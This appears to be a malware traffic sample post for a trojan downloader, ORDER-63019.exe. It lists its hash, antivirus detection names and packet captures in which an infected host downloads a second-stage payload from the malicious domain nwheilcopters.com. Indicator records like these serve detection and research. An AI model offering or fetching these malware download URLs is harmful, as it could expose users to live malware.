ORDER-63019.exe shit.exe nwheilcopters.com Malware Trojan Downloader Dropper PCAP File Download Traffic Sample

SHA256: 98bdbffa8d88d541f578597f218b3e2f2439ee736c0413cbe654b007d152a4bc
File name: ORDER-63019.exe
Detection ratio: 46 / 60
Analysis date: 2017-06-06 01:24:16 UTC ( 0 minutes ago )
Arcabit Trojan.Coantor.47 20170606
Avast Win32:Malware-gen 20170606
AVG Generic_vb.PMG 20170605
Avira (no cloud) TR/Dropper.VB.arvtb 20170605
AVware Trojan.Win32.Generic!BT 20170606
BitDefender Gen:Variant.Coantor.47 20170606
CAT-QuickHeal Trojan.Dynamer 20170605
Cyren W32/VBInject.JS.gen!Eldorado 20170606
DrWeb Trojan.PWS.Stealer.1932 20170606
Emsisoft Gen:Variant.Coantor.47 (B) 20170606
Endgame malicious (high confidence) 20170515
ESET-NOD32 a variant of Win32/Injector.DOVE 20170606
F-Prot W32/VBInject.JS.gen!Eldorado 20170606
F-Secure Gen:Variant.Coantor.47 20170606
Fortinet W32/Injector.DOVR!tr 20170606
GData Gen:Variant.Coantor.47 20170606

 

2017-06-05 17:41:53.468218 IP 192.168.1.102.63854 > 108.170.51.58.80: Flags [P.], seq 0:411, ack 1, win 256, length 411: HTTP: GET /pdff/ORDER-63019.exe HTTP/1.1
E…=’@…Z….fl.3:.n.P..-b….P…….GET /pdff/ORDER-63019.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: nwheilcopters.com
Connection: Keep-Alive

 

2017-06-05 17:42:51.810573 IP 192.168.1.102.59081 > 75.75.75.75.53: 17942+ A? nwheilcopters.com. (35)
E..?…….M…fKKKK…5.+W F…………nwheilcopters.com…..
2017-06-05 17:42:51.986243 IP 192.168.1.102.63856 > 108.170.51.58.80: Flags [S], seq 842477748, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4=t@…[]…fl.3:.p.P270……. ..q…………..
2017-06-05 17:42:52.082609 IP 192.168.1.102.63856 > 108.170.51.58.80: Flags [.], ack 1465304046, win 256, length 0
E..(=u@…[h…fl.3:.p.P270.WV..P………….
2017-06-05 17:42:52.089724 IP 192.168.1.102.63856 > 108.170.51.58.80: Flags [P.], seq 0:188, ack 1, win 256, length 188: HTTP: GET /chuksjamil/shit.exe HTTP/1.0
E…=v@…Z….fl.3:.p.P270.WV..P…B0..GET /chuksjamil/shit.exe HTTP/1.0
Host: nwheilcopters.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

2017-06-05 17:45:26.663212 IP 192.168.1.102.54601 > 40.77.229.75.443: Flags [P.], seq 234:351, ack 299, win 258, length 117
E…..@……..f(M.K.I..n…j.9.P…B…….p.8.ELb.M….b|W+….@………e~\…]..(……`…c.a..!.k…..G..C\……t…$..o..:..M.h{.&……|.%.a]…ms..
2017-06-05 17:45:26.809857 IP 192.168.1.102.54601 > 40.77.229.75.443: Flags [.], ack 448, win 257, length 0
E..(..@….,…f(M.K.I..n…j.9.P………….